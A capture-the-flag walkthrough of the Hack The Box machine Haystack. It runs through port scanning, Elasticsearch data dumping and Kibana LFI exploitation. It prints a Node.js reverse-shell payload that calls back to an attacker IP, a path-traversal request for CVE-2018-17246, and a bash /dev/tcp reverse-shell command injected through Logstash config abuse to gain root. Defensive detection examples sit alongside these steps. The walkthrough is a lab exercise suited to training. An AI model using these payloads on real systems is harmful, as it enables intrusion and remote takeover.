
Hello fellow hackers, today I'm going to solve Haystack from Hack The Box, so let's get started!!!
I started with nmap to check for open ports and services:
nmap -A -v -sT 10.10.10.115

So the machine has 3 ports open:
1- SSH on port 22
2- nginx web server on ports 80 and 9200
Let's go for the web server.
After opening the web server on port 80 I found an image of a needle in a haystack, and nothing else.

Now let's check port 9200.

It's an Elasticsearch database, and after some Google searching I found I can query it with curl through its SQL endpoint:
curl -X POST "10.10.10.115:9200/_xpack/sql?format=txt&pretty" -H 'Content-Type: application/json' -d'
{
"query": "SHOW TABLES"
}'

Let's check out the quotes table:
curl -X POST "10.10.10.115:9200/_xpack/sql?format=txt&pretty" -H 'Content-Type: application/json' -d' { "query": "desc quotes" }'

Let's dump the quotes.keyword column to a file:
curl -X POST "10.10.10.115:9200/_xpack/sql?format=txt&pretty" -H 'Content-Type: application/json' -d' { "query": "select quotes.keyword from quotes" }' > quotes_haystack.txt

And we have a haystack of Spanish words, but at the top of it it says: there is a needle in this haystack, you need to find it.
After some translating and searching I found two base64 strings.


After decoding the base64 strings we have a user and a password:
user : security
pass : spanish.is.key
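The "searching for base64" step above done programmatically, as an added example (my code, not the original post's): it scans a dump like quotes_haystack.txt line by line for runs of base64 alphabet, keeps only tokens that decode to printable text, and reports where they sit. The quotes below are constructed sample lines with two made-up tokens, not the box's actual data.

```python
import base64
import re

# Constructed stand-in for quotes_haystack.txt: Spanish filler lines with two
# made-up base64 tokens planted in them (not the box's real needle).
SAMPLE_QUOTES = """\
Esta aguja esta en el pajar, hay que encontrarla
El cielo es azul y la hierba es verde
Tengo que mirar en la pila de heno dXN1YXJpbyBkZSBlamVtcGxv
Las cosas no siempre son lo que parecen
El conejo bebe agua fresca del rio
Y despues tambien en el granero Y29udHJhc2VuYSBkZSBlamVtcGxv
Un sol de otono ilumina el campo
"""

# A run of base64 alphabet of at least 16 chars, optionally padded with "=".
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_candidate(token):
    """Return the decoded text if token is well-formed base64 that yields
    printable UTF-8, otherwise None (long ordinary words fail one of the checks)."""
    if len(token) % 4 != 0:
        return None
    try:
        raw = base64.b64decode(token, validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_needles(text):
    """Scan a dump line by line; return (line_no, token, decoded) for every hit."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for match in B64_RUN.finditer(line):
            decoded = decode_candidate(match.group(0))
            if decoded is not None:
                hits.append((line_no, match.group(0), decoded))
    return hits


if __name__ == "__main__":
    # With a real dump: find_needles(open("quotes_haystack.txt").read())
    for line_no, token, decoded in find_needles(SAMPLE_QUOTES):
        print(f"line {line_no}: {token} -> {decoded!r}")
```

The length-multiple-of-4 and printable-text checks are what keep ordinary long words out of the results; a dump with thousands of lines would otherwise produce a lot of false hits from the regex alone.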
Now let's ssh to the box!!!
ssh security@10.10.10.115

And we have the user flag!!!
Now let's go for the privilege escalation.
After some enumeration I found that Kibana is running on localhost only, so we need to pivot inside in order to see what's going on.
So to pivot inside I used an ssh local port forward, so that port 8080 on our machine reaches the box's 127.0.0.1:5601:
ssh -L 8080:127.0.0.1:5601 security@10.10.10.115
And now we can access Kibana from our machine.

After some enumeration I found that it's vulnerable to CVE-2018-17246 (Kibana LFI).
First we need to create a JavaScript reverse shell and save it as /tmp/shell.js on the box:
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1998, "10.10.14.85", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application from crashing
})();
Now let's set up our listener:
nc -vlp 1998
Now we have to include our file through the LFI:
https://127.0.0.1:8080/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../…/../../../tmp/shell.js
And we have a shell as the kibana user!!!
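From the defender's side, a check over web-server access logs for the kind of request used above, as an added example that is not part of the original write-up: it parses nginx combined-format lines, picks out calls to the Kibana console endpoint /api/console/api_server, and flags any apis= value that escapes its directory, whether plain, URL-encoded or double-encoded. The log lines are constructed for the example and are not real traffic from the box.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed nginx combined-format access-log lines for the example. Line 2
# mirrors the traversal request shown above, line 3 is the same thing
# URL-encoded, the other two are ordinary Kibana traffic.
SAMPLE_LOG = """\
10.10.14.85 - - [01/Aug/2019:10:00:01 +0000] "GET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=es_6_0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.10.14.85 - - [01/Aug/2019:10:00:07 +0000] "GET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../../../../tmp/shell.js HTTP/1.1" 200 0 "-" "curl/7.64.0"
10.10.14.85 - - [01/Aug/2019:10:00:09 +0000] "GET /api/console/api_server?sense_version=@@SENSE_VERSION&apis=..%2F..%2F..%2Ftmp%2Fshell.js HTTP/1.1" 200 0 "-" "curl/7.64.0"
10.10.14.85 - - [01/Aug/2019:10:00:12 +0000] "GET /app/kibana HTTP/1.1" 200 12345 "-" "Mozilla/5.0"
"""

# Enough of the combined format to pull out client, timestamp and request target.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

CONSOLE_PATH = "/api/console/api_server"


def is_traversal(value):
    """True if an apis= value tries to leave the bundled-API directory.
    Decodes twice so double-encoded %252e%252e forms are caught as well."""
    decoded = unquote(unquote(value)).replace("\\", "/")
    return ".." in decoded.split("/") or decoded.startswith("/")


def find_console_traversal(log_text):
    """Return (client_ip, timestamp, apis_value) for each console request whose
    apis parameter is a traversal attempt; every other line is ignored."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != CONSOLE_PATH:
            continue
        # parse_qs already applies one round of URL decoding to the values.
        for value in parse_qs(parts.query).get("apis", []):
            if is_traversal(value):
                hits.append((m.group("ip"), m.group("ts"), value))
    return hits


if __name__ == "__main__":
    # With a real log: find_console_traversal(open("/var/log/nginx/access.log").read())
    for ip, ts, value in find_console_traversal(SAMPLE_LOG):
        print(f"{ts} {ip} console traversal: apis={value}")
```

Matching on the normalised path segments rather than on the literal string "../" is what keeps the encoded variant from slipping past; a rule that only greps for dot-dot-slash misses line 3.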

Now for the root part.
After some enumeration I found that Logstash is running as root and we can read some of its config files.

So the input part indicates that every 10 seconds it searches for files named like "logstash_*" in the folder /opt/kibana. These files will be of type "execute".
In the filter part you can see that for files of type "execute" it will search for a string like: Ejecutar comando : COMMAND
Finally, in the output part it is indicated that the value of "comando" will be executed.
So in order to exploit it we need to inject our command inside a logstash file in /opt/kibana:
echo "Ejecutar comando : bash -i >&/dev/tcp/10.10.14.85/6666 0>&1" > /opt/kibana/logstash_12345
And we are root!!!

SMT Red Team